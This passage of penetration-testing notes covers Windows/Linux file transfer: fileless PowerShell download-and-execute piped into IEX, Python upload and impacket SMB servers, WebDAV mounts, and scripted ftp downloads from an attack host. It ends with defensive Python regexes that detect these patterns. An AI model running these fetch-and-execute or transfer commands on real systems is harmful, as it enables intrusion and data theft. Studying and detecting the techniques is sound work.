Note: it's not always possible to use this method, because cmd.exe has a maximum string length of 8191 characters, and a web shell may also error on strings that large.
Opposite Operation
I explained above how to encode in Linux and decode in PowerShell; now I'll explain the opposite: encode in PowerShell and decode in Linux.
In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource.
PowerShell DownloadString - Fileless Method. Fileless attacks use operating system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or its alias IEX.
PS C:\venator17> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX
Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
PS C:\carnifex17> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX
PowerShell doesn't have a built-in upload function, so we need to use Invoke-WebRequest or Invoke-RestMethod. We can also use the uploadserver module for Python; to install it, use:
pip3 install uploadserver
Turn On Web Server with Upload
python3 -m uploadserver
PowerShell Script to Upload a File to Python Upload Server
In some scenarios there will be an error forbidding unauthenticated guest access, so we can create an SMB server with authentication instead.
Create the SMB Server with a Username and Password
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Mount the SMB Server with Username and Password
C:\venator17> net use n: \\192.168.220.133\share /user:test test
Uploads
SMB uploads will be trickier because companies usually block uploads over SMB, since they could cause a huge problem. But we can use the HTTP or HTTPS protocol instead. When you connect to a share, Windows first attempts to connect using the SMB protocol, and if no SMB share is available it tries to connect using HTTP. For this we need the WebDAV protocol, which lets a web server behave like a file server, which is what we need. First you need to install it
Connecting to the WebDAV share. DavWWWRoot isn't a folder; it's a special keyword that tells WebDAV that we are connecting to the root of the WebDAV server. You could use any existing directory when connecting, for example sharefolder.
Create a Command File for the FTP Client and Download the Target File
C:\venator17> echo open 13.13.13.13 > ftpcommand.txt
C:\venator17> echo USER anonymous >> ftpcommand.txt
C:\venator17> echo binary >> ftpcommand.txt
C:\venator17> echo GET file.txt >> ftpcommand.txt
C:\venator17> echo bye >> ftpcommand.txt
C:\venator17> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous
ftp> GET file.txt
ftp> bye
C:\venator17>more file.txt
This is a test file
Uploads
For this we would also use pyftpdlib, but we need to specify the --write option to allow clients to upload files to our attack host.
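As an added example that is not part of the original notes: detection rules a defender could run over PowerShell script-block logs (Event ID 4104 ScriptBlockText) and process command lines to spot three of the patterns described on this page: a web download piped into IEX, the built-in ftp client driven by a -s: command file, and a net use mapping to a WebDAV DavWWWRoot path. The sample events, hosts and paths are constructed.

```python
import re

# Detection rules written for this example (not from the original post).
# Each rule is a regex applied to one log record: a PowerShell script-block
# text (Event ID 4104) or a process-creation command line.
DOWNLOAD_CMDS = r"(?:Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadString|DownloadData)"
EVAL_CMDS = r"(?:iex|Invoke-Expression)"

RULES = {
    # Web content piped straight into Invoke-Expression: the fileless IEX method
    "download_piped_to_iex": re.compile(
        rf"\b{DOWNLOAD_CMDS}\b.*\|\s*{EVAL_CMDS}\b", re.IGNORECASE),
    # Same technique written the other way round: IEX (...DownloadString(...))
    "iex_wrapping_download": re.compile(
        rf"\b{EVAL_CMDS}\b.*\b{DOWNLOAD_CMDS}\b", re.IGNORECASE),
    # Built-in ftp client driven by a command file (ftp -s:file)
    "ftp_command_file": re.compile(r"\bftp(?:\.exe)?\b.*\s-s:\S+", re.IGNORECASE),
    # Drive mapping to a WebDAV root, the HTTP path used when SMB is blocked
    "webdav_mount": re.compile(
        r"\bnet\s+use\b.*\\\\[^\\\s]+\\DavWWWRoot\b", re.IGNORECASE),
}

# Constructed sample records: hosts in 203.0.113.0/24 are documentation addresses.
SAMPLE_EVENTS = [
    "Invoke-WebRequest https://203.0.113.10/PowerView.ps1 -UseBasicParsing | IEX",
    "IEX (New-Object Net.WebClient).DownloadString('https://203.0.113.10/PowerView.ps1')",
    "Invoke-WebRequest https://intranet.example/report.csv -OutFile C:\\Temp\\report.csv",
    "ftp -v -n -s:ftpcommand.txt",
    "net use n: \\\\203.0.113.10\\DavWWWRoot",
    "net use n: \\\\192.168.220.133\\share /user:test test",
    "Get-Process | Invoke-Expression",
]


def classify(event: str) -> list[str]:
    """Return the names of all rules that match one log record (in rule order)."""
    return [name for name, rx in RULES.items() if rx.search(event)]


def scan(events) -> list[tuple[str, str]]:
    """Run every rule over a sequence of records and return (rule, record) hits."""
    return [(name, ev) for ev in events for name in classify(ev)]


if __name__ == "__main__":
    for rule, ev in scan(SAMPLE_EVENTS):
        print(f"{rule:24} {ev}")
```

Records 3, 6 and 7 are deliberate negatives: a download saved with -OutFile, an ordinary SMB mapping, and a pipe into Invoke-Expression that involves no download cmdlet.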